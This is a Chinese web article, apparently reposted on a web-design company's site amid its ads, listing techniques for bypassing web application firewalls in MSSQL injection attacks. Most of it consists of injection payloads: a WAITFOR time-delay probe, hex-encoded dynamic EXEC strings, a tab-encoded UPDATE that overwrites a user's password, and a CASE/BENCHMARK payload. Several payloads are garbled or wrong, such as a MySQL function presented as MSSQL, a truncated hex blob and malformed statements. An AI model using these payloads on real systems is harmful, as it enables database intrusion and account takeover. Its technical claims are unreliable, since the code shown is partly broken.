SQL注入攻击是一种常见的攻击,MSSQL也不例外,由于如今公司和组织通常都使用WAF层来防护,因此一些传统攻击方法可能会被拦截掉。下面,我们将简要介绍一些在MSSQL注入攻击中绕过WAF的实践技巧。
十载专业的建站公司历程,坚持以创新为先导的网站服务,服务超过上1000+企业及个人,涉及网站设计、成都app开发、微信开发、平面设计、互联网整合营销等多个领域。在不同行业和领域给人们的工作和生活带来美好变化。
– 延迟攻击:使用延迟执行技巧,将攻击代码放入循环或者IF语句中,以便多次执行攻击代码,直到攻击目的被实现。例如:
“`sql
IF (1=1) WAITFOR DELAY ‘0:0:5’–
- 空格编码:MSSQL的空格编码为' ',如果可以在URL中使用空格字符,则可以尝试使用变量来绕过WAF拦截:
```sql
DECLARE %20%20@S NVARCHAR(4000);SET @S=CAST(0x4400450043004C0041005200450020%20%20@V%20NVARCHAR(4000)%20AS%20NVARCHAR(4000));EXEC(@V);
--
– 特殊字符乱码技巧:将攻击代码中的特殊字符进行乱码处理,如:
“`sql
UPDATE%09users%09SET%09password%09=%09’3bc3e4da4ff34006a537db720d2e84ee’%09WHERE%09id%09=%09’1’%09–
- 编码HEX:将攻击代码转换为十六进制:
```sql
DECLARE @S NVARCHAR(4000);SET @S=CAST(0x4400450043004c0041005200450020@V NVARCHAR(4000) AS NVARCHAR(4000));EXEC(@V);--
– 利用括号技巧:在MSSQL中使用括号时,首先让括号被WAF拦截,再补充括号,使攻击代码能绕过WAF:
“`sql
SELECT+CASE+WHEN+6=6+THEN+BENCHMARK(10000000,(UPDATE()+users+SET+password+’3bc3e4da4ff34006a537db720d2e84ee’+WHERE+id=1))+ELSE+NULL+END–
通过以上技巧可以尝试绕过WAF,但是应该仅用于学习和安全评估的目的,绝不能用于非法攻击,违反法律可能导致严重的后果。
成都网站建设选创新互联(☎:028-86922220),专业从事成都网站制作设计,高端小程序APP定制开发,成都网络营销推广等一站式服务。
当前题目:MSSQL注入攻击绕过WAF的实践技巧(mssql注入过waf)
网页网址:http://www.shufengxianlan.com/qtweb/news4/2254.html
网站建设、网络推广公司-创新互联,是专注品牌与效果的网站制作,网络营销seo公司;服务项目有等
声明:本网站发布的内容(图片、视频和文字)以用户投稿、用户转载内容为主,如果涉及侵权请尽快告知,我们将会在第一时间删除。文章观点不代表本网站立场,如需处理请联系客服。电话:028-86922220;邮箱:631063699@qq.com。内容未经允许不得转载,或转载时需注明来源: 创新互联